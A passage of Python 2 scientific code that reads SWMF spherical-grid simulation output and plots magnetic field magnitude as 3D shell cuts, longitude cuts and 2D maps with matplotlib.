i_ph = (np.abs(_ph - ph[ind]) < eps).nonzero()[0][0]
i_th = (np.abs(_th - th[ind]) < eps).nonzero()[0][0]
# make sure we are assignating values to this array element
# for the 1st time!
assert np.all(np.isnan(data[i_r,i_ph,i_th])), \
'\n [-] this array element already has a value!!\n'+\
' * (i_r,i_ph,i_th): %d, %d, %d\n'%(i_r, i_ph, i_th)+\
' * file: %s\n'%(fname_inp if fname_inp is not None else '<data>')
# assignate value to this array-element
data[i_r,i_ph,i_th] = pdata[ind]
# percentage of the array that is storing the data that we
# actually read from 'fname_inp'.
fill_perc = 100.*(data.size - np.isnan(data).nonzero()[0].size)/data.size
logger.info(' [+] the data array was filled at %g %% \n' % fill_perc)
elif fformat=='hdf5':
_r, _ph, _th = r, ph, th
data = data_processor(_vdict, **{'r':r,'ph':ph,'th':th})
# NOTE: in case vetorial==True, we need a transpose
if vectorial:
data = data.transpose((1,2,3,0))
else:
raise SystemExit(' [-] wrong format (%r)!'%fformat)
return {
'ndata' : ndata,
'coords' : (_r, _ph, _th),
'data' : data
}
#@profile
def get_array_Bmod(fname_inp, nc=[6,4,4], nRoot=[8,8,4], nLevel=1):
r, ph, th, Bmod = read_data(fname_inp)
ndata = r.size
nc_r, nc_ph, nc_th = nc
nRootX, nRootY, nRootZ = nRoot
print "------ comeon men..."
npart_D = 2**nLevel # number of bi-partitions in EACH DIMENSION
# nmbr of blocks (or "sub-blocks")
nb_r = npart_D*nRootX
nb_ph = npart_D*nRootY
nb_th = npart_D*nRootZ
if nc_r*nb_r * nc_ph*nb_ph * nc_th*nb_th == ndata:
print ' [+] the number of entries in the file is consistent'
print ' with the number of cells/blocks and the nLevel'
print ' parameters!'
else:
# inconsistency in number of entries!
raise SystemExit("""
Inconsistency in the number of entries in the file!
>> expected : %d
>> number of entries in file : %d
"""%(nc_r*nb_r * nc_ph*nb_ph * nc_th*nb_th, ndata))
# initialize data
data = np.zeros((nc_r*nb_r, nc_ph*nb_ph, nc_th*nb_th))
_r = np.zeros(nc_r*nb_r)
_ph = np.zeros(nc_ph*nb_ph)
_th = np.zeros(nc_th*nb_th)
ib = 0
while ib*(nc_r*nc_th*nc_ph) < r.size:
print " block: ", ib
for ic_th in range(nc_th):
for ic_ph in range(nc_ph):
for ic_r in range(nc_r):
ind, ind_r, ind_ph, ind_th = \
ib_to_ind([ic_r,ic_ph,ic_th], ib, [r,ph,th],
nRoot, nc, nLevel)
# if it's not in zeros, you're trying to overwrite something!
assert (data[ind_r,ind_ph,ind_th] == 0.0),\
'\n [-] ERROR: trying to overwrite values!\n'
if _r[ind_r]!=0.0 and np.abs(r[ind]-_r[ind_r])>0.005:
import pdb; pdb.set_trace()
data[ind_r,ind_ph,ind_th] = Bmod[ind]
_r[ind_r] = r[ind]
_ph[ind_ph] = ph[ind]
_th[ind_th] = th[ind]
ib += 1
return {
'coords' : [_r, _ph, _th],
'Bmod' : data,
}
#@profile
def get_index_r(c, co):
"""
NOTE: we assume the coordinate 'c' is a monotonically ascending variable.
"""
dc_max = (c[1:] - c[:-1]).max() # coarser resolution in c
# what follows is valid if we fulfill this:
cmin, cmax = c[0], c[-1]
assert (co<=cmax) and (co>=cmin),\
'\n [-] ERROR: \'co\' (=%g) must be inside the interval (%g, %g)\n'%(co,cmin,cmax)
assert c[0]==c.min() and c[-1]==c.max(), \
' [-] ERROR: this variable should be monotically ascending!\n'
# choose the closest in the grid
co_behind, co_ahead = c[c<=co][-1], c[c>=co][0]
be_gt_ah = (co-co_behind) >= (co_ahead-co)
if be_gt_ah:
i_c = (c>=co).nonzero()[0][0] ## RIGHT??. Check first!!
else:
i_c = (c<=co).nonzero()[0][-1]
return i_c
def get_subcoord(isb, iLevel=0):
"""
isb : cardinal of the sub-block inside the memory (or root) block
iLevel : level of bipartition
"""
ibb = isb % 8
scoord_r = (ibb % (2**1))/(2**0)
scoord_ph = (ibb % (2**2))/(2**1)
scoord_th = (ibb % (2**3))/(2**2)
"""
Depending on the value of iLevel, the 3-tuple that get_subcoord(..)
returns means different things. For instance,
iLevel=0: the finest-grained location of the sub-block number isb.
iLevel=1: the location of the octree in units of number of octrees.
iLevel=2: the location of the octree that contains 8 octrees.
... so on ...
"""
if iLevel>0:
_i0, _i1, _i2 = get_subcoord(isb/8, iLevel=iLevel-1)
scoord_r += _i0*2
scoord_ph += _i1*2
scoord_th += _i2*2
return scoord_r, scoord_ph, scoord_th
def deduce_terna(ib, nRoot=[8,8,4], nc=[6,4,4], nLevel=1):
"""
According to documentation, X,Y,Z goes in the same order
as R,LON,LAT.
"""
nRootX, nRootY, nRootZ = nRoot
nc_r, nc_ph, nc_th = nc
# location inside the mem-blk, in units of sub-blocks
# TODO: chekar si hay q reemplazar con 'nLevel'
# TODO: probar con otros valores de nLevel!=1
npart_D = 2**nLevel # number of bi-partitions in EACH DIMENSION
ibb_r, ibb_ph, ibb_th = \
get_subcoord(isb=ib%(npart_D**3), # cardinal inside the root block
iLevel=nLevel)
# the "octree" is composed by 2**(3*nLevel) children-blocks.
ib_mem = int(ib/(npart_D**3))
ib_mem_r = ib_mem % nRootX
ib_mem_ph = (ib_mem/nRootX) % nRootY
ib_mem_th = ib_mem / (nRootX*nRootY)
return {
'ib_mem': [ib_mem_r, ib_mem_ph, ib_mem_th],
'ibb': [ibb_r, ibb_ph, ibb_th],
}
def make_sphere_shells(dir_src, dir_out, prefix_fig, ro, pazim=-60., clim=[None,None], verbose='debug', vnames=[], data_processor=None):
prefix_inp = '3d__var_1_n'
fnm_s = glob.glob(dir_src + '/' + prefix_inp + '*.out')
# get the time labels as 'int' variables && sort it
it_s = [ int(fnm.split('.out')[-2].split(prefix_inp)[-1]) for fnm in fnm_s ]
it_s.sort()
# number of digits in the time label (take the 1st element as sample)
#ndigits = len(fnm_s[0].split('.out')[-2].split(prefix_inp)[-1])
for it in it_s:
fname_inp = dir_src + '/' + prefix_inp + '%08d.out'%it
fname_fig = dir_out + '/' + prefix_fig + '%08d.png'%it
logger.info(' [+] generating figure %d/%d ...\n' % (it, len(it_s)))
_o = plot_sphere_cuts(fname_inp, fname_fig, ro, pazim, clim,
checks=False, complete=True, verbose=verbose, vnames=vnames,
data_processor=data_processor)
logger.info(' [+] saved: %s\n' % fname_fig)
del _o
def plot_sphere_cuts(fname_inp, fname_fig, ro, pazim=-60., clim=[None,None], checks=False, complete=True, verbose='debug', vnames=[], data_processor=None, nc=None, nRoot=None, nLevel=None):
"""
make 3D plot with a radial and longitudinal cuts
"""
logger.setLevel(getattr(logging, verbose.upper()))
r2d = 180./np.pi
#d = get_array_Bmod(fname_inp, nc, nRoot, nLevel)
assert len(vnames)>0, ' [-] We need names in vnames!\n'
# we'll obtain:
# - same data but in structured way; friendly for plot_surface().
# - fill 'vdict'' with original ASCII data
d = get_array_vars(fname_inp, checks=checks, complete_domain_walk=complete, vnames=vnames, data_processor=data_processor)
# NOTE: d['data'] is processed sutff built from the original (from
# the ASCII file) simulation data. Such processing was made
# by 'data_processor()'.
# NOTE: a this point, 'vdict' has the original data from the ASCII file.
r, ph, th = d['coords']
Bmod = d['data'];
print ' [+] global extremes:', np.nanmin(Bmod), np.nanmax(Bmod)
#--- slice an specific shell r=ro
i_r = get_index_r(r, ro)
print ' > We\'ll plot i_r: ', i_r
# we need the transpose in order to be consistent with 'plot_surface'
var_bare = Bmod.transpose((1,0,2))[:,i_r,:]
# same w/o NaNs
var, ph_clean, th_clean = clean_sparse_array(var_bare, ph, th)
print '[+] plot extremes: ', np.nanmin(var), np.nanmax(var)
# NOTE: 'plot_surface' can only plot variables with shape (n,m), so
# no 3D variables.
cbmin, cbmax = [np.nanmin(var), np.nanmax(var)] if clim==[None,None] else clim
print " >> ", np.nanmean(var), np.nanmedian(var)
# mesh versions of the coords
R, PH, TH = np.meshgrid(r, ph_clean, th_clean)
# get the cartesian coords (I know!)
X = R * np.cos(TH) * np.cos(PH)
Y = R * np.cos(TH) * np.sin(PH)
Z = R * np.sin(TH)
#--- figure
fig = figure(1,)
ax = fig.add_subplot(111, projection='3d')
norm = Normalize(cbmin, cbmax)
# other options
opt = {
'rstride' : 1,
'cstride' : 1,
'linewidth' : 0,
'antialiased' : False,
'shade' : False,
'alpha' : 1., #kargs.get('alpha',0.9),
'cmap' : cm.jet, # gray-scale
'norm' : Normalize(cbmin, cbmax),
'vmin' : cbmin, #kargs.get('cbmin',1),
'vmax' : cbmax, #kargs.get('cbmax',1000),
'facecolors' : cm.jet(norm(var)),
#'edgecolors' : 'none',
}
print '\n [*] Generating 3D plot...\n'
surf = ax.plot_surface(X[:,i_r,:], Y[:,i_r,:], Z[:,i_r,:], **opt)
# Note the cm.jet(..) --> cm.jet(norm(..)); see:
# https://stackoverflow.com/questions/25023075/normalizing-colormap-used-by-facecolors-in-matplotlib
# perspective azimuth
ax.azim = pazim
sm = cm.ScalarMappable(cmap=surf.cmap, norm=surf.norm)
sm.set_array(var); #surf.set_array(var)
ax.set_xlabel('X [Ro]')
ax.set_ylabel('Y [Ro]')
ax.set_zlabel('Z [Ro]')
ax.set_title('$r_o$ = %.2g $R_o$' % r[i_r])
#--- colorbar
cb_label = '|B| [G]'
cb_fontsize = 13
axcb = fig.colorbar(sm, ax=ax)
axcb.set_label(cb_label, fontsize=cb_fontsize)
sm.set_clim(vmin=cbmin, vmax=cbmax)
# save figure
#show()
fig.savefig(fname_fig, dpi=135, bbox_inches='tight')
close(fig)
return d
#@profile
def PlotCut_fixed_ph(fig_stuff, data, pho, r_range, pazim=-60., verbose='debug'):
"""
make 3D plot with a radial and longitudinal cuts
"""
r2d = 180./np.pi
Bmod = data['data'] # TODO: change ¡Bmod¡ to data/var/something
r, ph, th = data['coords']
#--- slice an specific longitude slice at 'pho'
i_ph = get_index_r(ph, pho/r2d)
print ' > We\'ll plot i_ph: ', i_ph
# set the plot range in 'r'
i_r_min = get_index_r(r, r_range[0])
i_r_max = get_index_r(r, r_range[1])
# we'll search a interval in phi such that var_bare has some numeric values.
# NOTE: 10 iterations seems reasonable.
for i_dph in range(0,10):
# we need the transpose in order to be consistent with 'plot_surface'
var_bare = np.nanmean(
Bmod.transpose((1,0,2))[i_ph-i_dph:i_ph+i_dph+1,i_r_min:i_r_max+1,:],
axis = 0,
)
# if it has some numeric content, we have valid
# data in 'var_bare', so we are done.
if not np.isnan(np.nanmean(var_bare)): break
# same w/o NaNs
var, r_clean, th_clean = clean_sparse_array(var_bare,r[i_r_min:i_r_max+1],th)
print '[+] plot extremes: ', np.nanmin(var), np.nanmax(var)
# NOTE: 'plot_surface' can only plot variables with shape (n,m), so
# no 3D variables.
print " >> mean, median: ", np.nanmean(var), np.nanmedian(var)
# mesh versions of the coords
R, TH = np.meshgrid(r_clean, th_clean)
# get the cartesian coords (I know!)
X = R * np.cos(TH) * np.cos(ph[i_ph])
Y = R * np.cos(TH) * np.sin(ph[i_ph])
Z = R * np.sin(TH)
#--- figure
fig_stuff['fig'], fig_stuff['ax'], surf = plot_stuff(
[fig_stuff['fig'], fig_stuff['ax']],
coords = [X,Y,Z],
var = var.T,
norm = fig_stuff['norm'],
)
return {
'FigAx' : (fig_stuff['fig'], fig_stuff['ax']),
'ph_plot' : ph[i_ph],
'surf' : surf,
}
#@profile
def PlotCut_fixed_r(fig_stuff, data, ro, pazim=-60., verbose='debug'):
"""
make 3D plot with a radial and longitudinal cuts
"""
r2d = 180./np.pi
# kws
Bmod = data['data'] # TODO: change ¡Bmod¡ to data/var/something
r, ph, th = data['coords']
#--- slice an specific shell r=ro
i_r = get_index_r(r, ro)
print ' > We\'ll plot i_r: ', i_r
# we need the transpose in order to be consistent with 'plot_surface'
var_bare = Bmod.transpose((1,0,2))[:,i_r,:]
# same w/o NaNs
var, ph_clean, th_clean = clean_sparse_array(var_bare, ph, th)
print '[+] plot extremes: ', np.nanmin(var), np.nanmax(var)
# NOTE: 'plot_surface' can only plot variables with shape (n,m), so
# no 3D variables.
#cbmin, cbmax = [np.nanmin(var), np.nanmax(var)] if clim==[None,None] else clim
print " >> ", np.nanmean(var), np.nanmedian(var)
# mesh versions of the coords
PH, TH = np.meshgrid(ph_clean, th_clean)
# get the cartesian coords (I know!)
X = r[i_r] * np.cos(TH) * np.cos(PH)
Y = r[i_r] * np.cos(TH) * np.sin(PH)
Z = r[i_r] * np.sin(TH)
#norm = LogNorm(cbmin,cbmax) if kws.get('cscale','log')=='log' else Normalize(cbmin,cbmax)
#--- figure
fig_stuff['fig'], fig_stuff['ax'], surf = plot_stuff(
[fig_stuff['fig'], fig_stuff['ax']],
coords = [X,Y,Z],
var = var.T,
norm = fig_stuff['norm'],
)
return {
'FigAx' : (fig_stuff['fig'], fig_stuff['ax']),
'r_plot' : r[i_r],
'surf' : surf,
}
def plot_stuff(FigAx, coords, var, norm):
fig, ax = FigAx
X, Y, Z = coords
#--- figure
# other options
opt = {
'rstride' : 1,
'cstride' : 1,
'linewidth' : 0,
'antialiased' : False,
'shade' : False,
'alpha' : 1., #kargs.get('alpha',0.9),
'cmap' : cm.jet, # gray-scale
'norm' : norm,
'vmin' : norm.vmin, #kargs.get('cbmin',1),
'vmax' : norm.vmax, #kargs.get('cbmax',1000),
'facecolors' : cm.jet(norm(var)),
#'edgecolors' : 'none',
}
print '\n [*] Generating 3D plot...\n'
surf = ax.plot_surface(X[:,:], Y[:,:], Z[:,:], **opt)
# Note the cm.jet(..) --> cm.jet(norm(..)); see:
# https://stackoverflow.com/questions/25023075/normalizing-colormap-used-by-facecolors-in-matplotlib
return fig, ax, surf
def file_format(fname):
cmd = 'file %s | awk -F: \'{print $2}\'' % fname
p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=STDOUT, bufsize=1, shell=True)
std = p.communicate()
assert p.returncode == 0, \
'\n [-] something went wrong: %r\n' % std
stdout = std[0]
if stdout.startswith(' ASCII text'):
return 'ascii'
elif stdout.startswith(' Hierarchical Data Format (version 5) data'):
return 'hdf5'
elif stdout.startswith(' data'):
return 'binary'
else:
return None
#@profile
def make_3dplot(fname_inp, fname_fig, clim=[None,None], vnames=[], data_processor=None, verbose='debug', **kws):
"""
make 3D plot with a radial and longitudinal cuts
"""
logger.setLevel(getattr(logging, verbose.upper()))
assert len(vnames)>0, ' [-] We need names in vnames!\n'
# we'll obtain:
# - same data but in structured way; friendly for plot_surface().
# - fill 'vdict'' with original ASCII data
d = get_array_vars(fname_inp, checks=False, complete_domain_walk=True, vnames=vnames, data_processor=data_processor)
# NOTE: d['data'] is processed sutff built from the original (from
# the ASCII file) simulation data. Such processing was made
# by 'data_processor()'.
# NOTE: a this point, 'vdict' has the original data from the ASCII file.
r, ph, th = d['coords']
Bmod = d['data'];
print ' [+] global extremes:', np.nanmin(Bmod), np.nanmax(Bmod)
cbmin, cbmax = clim if clim is not [None,None] else (np.nanmin(Bmod),np.nanmax(Bmod))
figsize = kws.get('figsize', None) # [inches] 2-tuple
if figsize is None:
# Deduce the 'figsize' as a function of:
# * the dpi of the monitor
# * the desired size in pixels of the figure
# Grab the dpi value of this monitor. Source:
# * https://stackoverflow.com/questions/13714454/specifying-and-saving-a-figure-with-exact-size-in-pixels#13714720
# * https://stackoverflow.com/questions/3129322/how-do-i-get-monitor-resolution-in-python/45467999#45467999
tk = Tkinter.Tk()
dpi_w = tk.winfo_screenwidth()/(tk.winfo_screenmmwidth()/25.4)
dpi_h = tk.winfo_screenheight()/(tk.winfo_screenmmheight()/25.4)
# size in pixels
pixels = kws.get('pixels', [128.,100.])
figsize = (pixels[0]/dpi_w, pixels[1]/dpi_h) # [inches]
#--- figure
fig_stuff = {
'fig' : figure(1, figsize=figsize),
}
fig_stuff.update({
'ax' : fig_stuff['fig'].add_subplot(111, projection='3d'),
'norm' : LogNorm(cbmin,cbmax) if kws.get('cscale','log')=='log' else Normalize(cbmin,cbmax),
})
fig = fig_stuff['fig']
ax = fig_stuff['ax']
norm = fig_stuff['norm']
#--- plot for fixed "r"
o__fixed_r = PlotCut_fixed_r(fig_stuff, d,
ro = kws.get('ro', 5.0),
pazim = kws.get('pazim',-60.),
verbose = verbose,
)
fig, ax = o__fixed_r['FigAx']
r_plot = o__fixed_r['r_plot']
surf_r = o__fixed_r['surf']
#--- plot for fixed "ph"
r_range = kws.get('r_range', [1.0,7.0])
pho = kws.get('pho', 10.0)
o__fixed_r = PlotCut_fixed_ph(fig_stuff, d,
pho = pho,
r_range=r_range,
pazim = kws.get('pazim',-60.),
verbose = verbose,
)
fig, ax = o__fixed_r['FigAx']
ph_plot = o__fixed_r['ph_plot']
surf_ph = o__fixed_r['surf']
# uniform axis limits
axmin = np.min([getattr(ax,'get_%slim'%dim)() for dim in ('x','y','z')])
axmax = np.max([getattr(ax,'get_%slim'%dim)() for dim in ('x','y','z')])
ax.set_xlim(axmin,axmax)
ax.set_ylim(axmin,axmax)
ax.set_zlim(axmin,axmax)
# perspective azimuth
ax.azim = kws.get('pazim', -60.)
sm = cm.ScalarMappable(cmap=surf_r.cmap, norm=fig_stuff['norm'])
sm.set_array(d['data']); #surf.set_array(var)
# labels && title
ax.set_xlabel('X [Ro]')
ax.set_ylabel('Y [Ro]')
ax.set_zlabel('Z [Ro]')
TITLE = '$r_o$ = %.2g $R_o$' % r_plot +\
'\n($\phi_o$,r1,r2) : ($%g^o,%g\,Ro,%g\,Ro$)' % (pho,r_range[0],r_range[1])
# extract the step number from the input filename
if kws.get('wtimelabel',False):
tlabel = fname_inp.split('/')[-1].split('.h5')[0].split('_')[-1].replace('n','')
TITLE += '\n step: '+tlabel
ax.set_title(TITLE)
#--- colorbar
cb_label = '|B| [G]'
cb_fontsize = 13
axcb = fig.colorbar(sm, ax=ax)
axcb.set_label(cb_label, fontsize=cb_fontsize)
sm.set_clim(vmin=cbmin, vmax=cbmax)
# save figure
#show()
fig.savefig(fname_fig, dpi=kws.get('dpi',100), bbox_inches='tight')
close(fig)
del fig
return None
def r_cut(fname_inp, fname_fig, ro, _dph=[None,None], _dth=[None,None], figsize=(6,4), clim=[None,None], colormap='hot', cb_label='|B| [G]', verbose='debug', vnames=[], data_processor=None, cscale='linear', interactive=False, **kws):
"""
make 2D plot with a radial cut
"""
logger.setLevel(getattr(logging, verbose.upper()))
r2d = 180./np.pi
assert len(vnames)>0, ' [-] We need names in vnames!\n'
# we'll obtain:
# - same data but in structured way; friendly for plot_surface().
# - fill 'vdict'' with original ASCII data
d = get_array_vars(fname_inp, checks=False, complete_domain_walk=True,
vnames=vnames, data_processor=data_processor)
assert d is not None
# NOTE: d['data'] is processed sutff built from the original (from
# the ASCII file) simulation data. Such processing was made
# by 'data_processor()'.
# NOTE: a this point, 'vdict' has the original data from the ASCII file.
r, ph, th = d['coords'] # shape (:,:,:)
Bmod = d['data'];
print ' [+] global extremes:', np.nanmin(Bmod), np.nanmax(Bmod)
# check defaults values
dth = copy.deepcopy(_dth) # (*)
dth[0] = dth[0] if dth[0] is not None else th[0]*r2d
dth[1] = dth[1] if dth[1] is not None else th[-1]*r2d
dph = copy.deepcopy(_dph) # (*)
dph[0] = dph[0] if dph[0] is not None else ph[0]*r2d
dph[1] = dph[1] if dph[1] is not None else ph[-1]*r2d
# (*): we need to make a copy because otherwise it will change the
# value of the pointer that is given in _th (_ph); if this happens,
# the values that dth (dph) adopts here will be parsed as argument
# in the next call to the present function!
# So, in order to keep the original value that is parsed as argument
# dth, dph the first time, we should read it in "read-only" mode with
# deepcopy().
# make selection in a given width in longitude (centered in
# the `lon` value)
cc_ph = (ph*r2d>=dph[0]) & (ph*r2d<=dph[1])
cc_th = (th*r2d>=dth[0]) & (th*r2d<=dth[1])
if (cc_ph.nonzero()[0].size > 0) and (cc_th.nonzero()[0].size > 0):
print(' [+] phi plot limits: (%g, %g)' % (ph[cc_ph][0]*r2d,ph[cc_ph][-1]*r2d))
else:
raise SystemExit(
'\n [-] the selection in longitude and theta is NULL!\n' +\
' cc_ph.size: %d\n cc_th.size: %d\n' % (cc_ph.nonzero()[0].size, cc_th.nonzero()[0].size)
)
#--- slice an specific r
# set the plot range in 'r'
i_r = get_index_r(r, ro)
i_th_ini = get_index_r(th*r2d, dth[0])
i_th_end = get_index_r(th*r2d, dth[1])
logger.debug(' [+] averaging lices in phi and r ...')
#var_bare = np.nanmean(Bmod.transpose((1,0,2))[cc_ph,i_r,:], axis=0)
var_bare = Bmod.transpose((1,0,2))[cc_ph,i_r,i_th_ini:i_th_end+1]
# same w/o NaNs columns/rows
var, ph_clean, th_clean = clean_sparse_array(var_bare, ph[cc_ph], th[cc_th])
#fig = figure(1,); ax=fig.add_subplot(111)
#ax.pcolor(var); show()
#import pdb; pdb.set_trace()
var_m = np.ma.masked_where(np.isnan(var), var)
print '[+] plot extremes: ', np.nanmin(var), np.nanmax(var)
# NOTE: 'plot_surface' can only plot variables with shape (n,m), so
# no 3D variables.
cbmin, cbmax = [np.nanmin(var), np.nanmax(var)] \
if clim==[None,None] else clim
print " >> mean/median: ", np.nanmean(var), np.nanmedian(var)
# mesh versions of the coords
PH, TH = np.meshgrid(ph_clean*r2d, th_clean*r2d)
#--- figure
fig = figure(1, figsize=figsize)
ax = fig.add_subplot(111, )
#--- other options
# color scale
if cscale=='linear':
norm = Normalize(cbmin, cbmax)
elif cscale=='log':
norm = LogNorm(cbmin, cbmax)
else:
raise SystemExit(' [-] invalid color scale: '+cscale+'\n')
opt = {
#'rstride' : 1,
#'cstride' : 1,
'linewidth' : 0,
#'antialiased' : False,
#'shade' : False,
#'shading' : 'flat',
#'alpha' : 1., #kargs.get('alpha',0.9),
'cmap' : getattr(cm,colormap), #cm.hot, # gray-scale
'norm' : norm,
'vmin' : cbmin, #kargs.get('cbmin',1),
'vmax' : cbmax, #kargs.get('cbmax',1000),
#'facecolors' : cm.jet(norm(var_m)),
#'interpolation' : 'none',
'edgecolors' : 'None',
#'corner_mask' : True,
}
# Note the cm.jet(..) --> cm.jet(norm(..)); see:
# https://stackoverflow.com/questions/25023075/normalizing-colormap-used-by-facecolors-in-matplotlib
print '\n [*] Generating 3D plot...\n'
#surf = ax.contourf(RHO[:,:], Z[:,:], var_m[:,:].T, **opt)
surf = ax.pcolormesh(PH[:,:], TH[:,:], var_m[:,:].T, **opt)
#surf = ax.scatter(th_clean, r_clean, c=var[:,:], **opt)
_iph, _ith = np.argwhere(~np.isnan(var[:,:])).T
_ph, _th = ph_clean[_iph], th_clean[_ith]
#surf = ax.scatter(_ph, _th, c=var[_iph,_ith], **opt)
# perspective azimuth
sm = cm.ScalarMappable(cmap=surf.cmap, norm=surf.norm)
sm.set_array(var_m); #surf.set_array(var)
ax.set_xlabel('$\phi$ [deg]')
ax.set_ylabel('$\\theta$ [deg]')
TITLE = '$r_o = %.2f$ $R_O$\n' % r[i_r] +\
'$\phi$ limits: $(%.1f, %.1f)^o$\n'%(ph[cc_ph][0]*r2d, ph[cc_ph][-1]*r2d) +\
'$\\theta$ limits: $(%.1f, %.1f)^o$'%(th[i_th_ini]*r2d,th[i_th_end]*r2d)
# extract the step number from the input filename
if kws.get('wtimelabel',False):
tlabel = fname_inp.split('/')[-1].split('.h5')[0].split('_')[-1].replace('n','')
TITLE += '\n step: '+tlabel
ax.set_title(TITLE)
#--- colorbar
#cb_label = '|B| [G]'
cb_fontsize = 13
axcb = fig.colorbar(sm, ax=ax)
axcb.set_label(cb_label, fontsize=cb_fontsize)
sm.set_clim(vmin=cbmin, vmax=cbmax)
# save figure
if interactive:
show()
else:
fig.savefig(fname_fig, dpi=135, bbox_inches='tight')
close(fig)
return d
def lon_cut(fname_inp, fname_fig, lon=0.0, dlon=0.0, r_range=[1.,24.], clim=[None,None], verbose='debug', vnames=[], data_processor=None, cscale='linear', interactive=False):
"""
make 2D plot with a radial cut
"""
logger.setLevel(getattr(logging, verbose.upper()))
r2d = 180./np.pi
assert len(vnames)>0, ' [-] We need names in vnames!\n'
# we'll obtain:
# - same data but in structured way; friendly for plot_surface().
# - fill 'vdict'' with original ASCII data
d = get_array_vars(fname_inp, checks=False, complete_domain_walk=True, vnames=vnames, data_processor=data_processor)
assert d is not None
# NOTE: d['data'] is processed sutff built from the original (from
# the ASCII file) simulation data. Such processing was made
# by 'data_processor()'.
# NOTE: a this point, 'vdict' has the original data from the ASCII file.
r, ph, th = d['coords'] # shape (:,:,:)
Bmod = d['data'];
print ' [+] global extremes:', np.nanmin(Bmod), np.nanmax(Bmod)
#--- slice an specific longitude = `lon`
#i_ph = get_index_r(ph*r2d, lon)
#print ' > We\'ll plot i_ph: ', i_ph
# set the plot range in 'r'
i_r_min = get_index_r(r, r_range[0])
i_r_max = get_index_r(r, r_range[1])
# make selection in a given width in longitude (centered in
# the `lon` value)
cc_ph = (ph*r2d>=(lon-.5*dlon)) & (ph*r2d<=(lon+.5*dlon))
if (cc_ph.nonzero()[0].size > 0) and (i_r_max - i_r_min + 1 > 0):
print(' [+] phi plot limits: (%g, %g)' % (ph[cc_ph][0]*r2d,ph[cc_ph][-1]*r2d))
print(' [+] r plot limits: (%g, %g)\n' % (r[i_r_min], r[i_r_max]))
else:
raise SystemExit('\n [-] the selection in longitude and radii is NULL!\n')
logger.debug(' [+] averaging %d slices of phi ...'%len(cc_ph.nonzero()[0]))
var_bare = np.nanmean(Bmod.transpose((1,0,2))[cc_ph,i_r_min:i_r_max+1,:], axis=0)
# same w/o NaNs columns/rows
var, r_clean, th_clean = clean_sparse_array(var_bare, r[i_r_min:i_r_max+1], th)
#var_m = np.ma.masked_where(np.isnan(var),var)
#var_m = np.ma.array(var, mask=np.isnan(var))
var_m = np.ma.masked_where(np.isnan(var), var)
print '[+] plot extremes: ', np.nanmin(var), np.nanmax(var)
# NOTE: 'plot_surface' can only plot variables with shape (n,m), so
# no 3D variables.
cbmin, cbmax = [np.nanmin(var), np.nanmax(var)] if clim==[None,None] else clim
print " >> ", np.nanmean(var), np.nanmedian(var)
# mesh versions of the coords
R, TH = np.meshgrid(r_clean, th_clean)
# get the cartesian coords (I know!)
RHO = R * np.cos(TH)
Z = R * np.sin(TH)
#--- figure
fig = figure(1, figsize=(6,5))
ax = fig.add_subplot(111, )
#--- other options
# color scale
if cscale=='linear':
norm = Normalize(cbmin, cbmax)
elif cscale=='log':
norm = LogNorm(cbmin, cbmax)
else:
raise SystemExit(' [-] invalid color scale: '+cscale+'\n')
opt = {
#'rstride' : 1,
#'cstride' : 1,
'linewidth' : 0,
#'antialiased' : False,
#'shade' : False,
#'shading' : 'flat',
#'alpha' : 1., #kargs.get('alpha',0.9),
'cmap' : cm.jet, # gray-scale
'norm' : norm,
'vmin' : cbmin, #kargs.get('cbmin',1),
'vmax' : cbmax, #kargs.get('cbmax',1000),
'facecolors' : cm.jet(norm(var_m)),
#'interpolation' : 'none',
'edgecolors' : 'None',
#'corner_mask' : True,
}
print '\n [*] Generating 3D plot...\n'
#surf = ax.contourf(RHO[:,:], Z[:,:], var_m[:,:].T, **opt)
#surf = ax.pcolormesh(RHO[:,:], Z[:,:], var_m[:,:].T, **opt)
#surf = ax.scatter(th_clean, r_clean, c=var[:,:], **opt)
_ir, _ith = np.argwhere(~np.isnan(var[:,:])).T
_r, _th = r_clean[_ir], th_clean[_ith]
_x, _y = _r*np.cos(_th), _r*np.sin(_th)
surf = ax.scatter(_x, _y, c=var[_ir,_ith], **opt)
# Note the cm.jet(..) --> cm.jet(norm(..)); see:
# https://stackoverflow.com/questions/25023075/normalizing-colormap-used-by-facecolors-in-matplotlib
# perspective azimuth
sm = cm.ScalarMappable(cmap=surf.cmap, norm=surf.norm)
sm.set_array(var_m); #surf.set_array(var)
ax.set_xlabel('$\\rho$ [Ro]')
ax.set_ylabel('$Z$ [Ro]')
TITLE = ' global $\phi$ limits: (%g, %g) \n' % (ph[0]*r2d, ph[-1]*r2d) +\
'$\phi$ interval for plot: (%.2g, %.2g) [deg]\n' % (ph[cc_ph][0]*r2d, ph[cc_ph][-1]*r2d) +\
'$r$ interval: (%.2g, %.2g) [Ro]' % (r[i_r_min], r[i_r_max])
ax.set_title(TITLE)
#ax.set_xlim(1.7, 1.9)
#ax.set_ylim(-0.1, 0.1)
#--- colorbar
cb_label = '|B| [G]'
cb_fontsize = 13
axcb = fig.colorbar(sm, ax=ax)
axcb.set_label(cb_label, fontsize=cb_fontsize)
sm.set_clim(vmin=cbmin, vmax=cbmax)
# save figure
if interactive:
show()
else:
fig.savefig(fname_fig, dpi=135, bbox_inches='tight')
close(fig)
return d
#@profile
def clean_sparse_array(m, x, y):
"""
remove all rows and columns full of zeros
"""
ni, nj = m.shape
clean_j = list(range(0,nj))
logger.info(' [+] cleaning sparse array......')
for j in range(nj):
if all(np.isnan(m[:,j])):
# remove the element with value 'j'
logger.debug(' [+] clearing slice with j=%d'%j)
clean_j.remove(j)
# clean columns
m1 = m[:,clean_j]
y_clean = y[clean_j]
# now let's clean the rows
clean_i = list(range(0,ni))
for i in range(ni):
if all(np.isnan(m[i,:])):
# remove the i-th element
logger.debug(' [+] clearing slice with i=%d'%i)
clean_i.remove(i)
# clean rows
m2 = m1[clean_i,:]
x_clean = x[clean_i]
# clean version of 'm'
return m2, x_clean, y_clean
def get_domains(coords, eps=0.005, checks=True, complete=False, nc=[6,4,4], nRoot=[8,8,4], nLevel=1):
"""
checks : if True, if checks that the file size is consistent
with a complete structure of cells and children-blocks.
complete : if True, is walks all the ASCII file entries, one by one.
"""
r, ph, th = coords # original coords from SWMF's output
ndata = r.size
if checks:
nc_r, nc_ph, nc_th = nc
nRootX, nRootY, nRootZ = nRoot
npart_D = 2**nLevel # number of bi-partitions in EACH DIMENSION
# nmbr of blocks (or "sub-blocks")
nb_r = npart_D*nRootX
nb_ph = npart_D*nRootY
nb_th = npart_D*nRootZ
# at least, it should multiple of the size of the smallest sub-block
assert ndata % (nc_r*nc_ph*nc_th) == 0
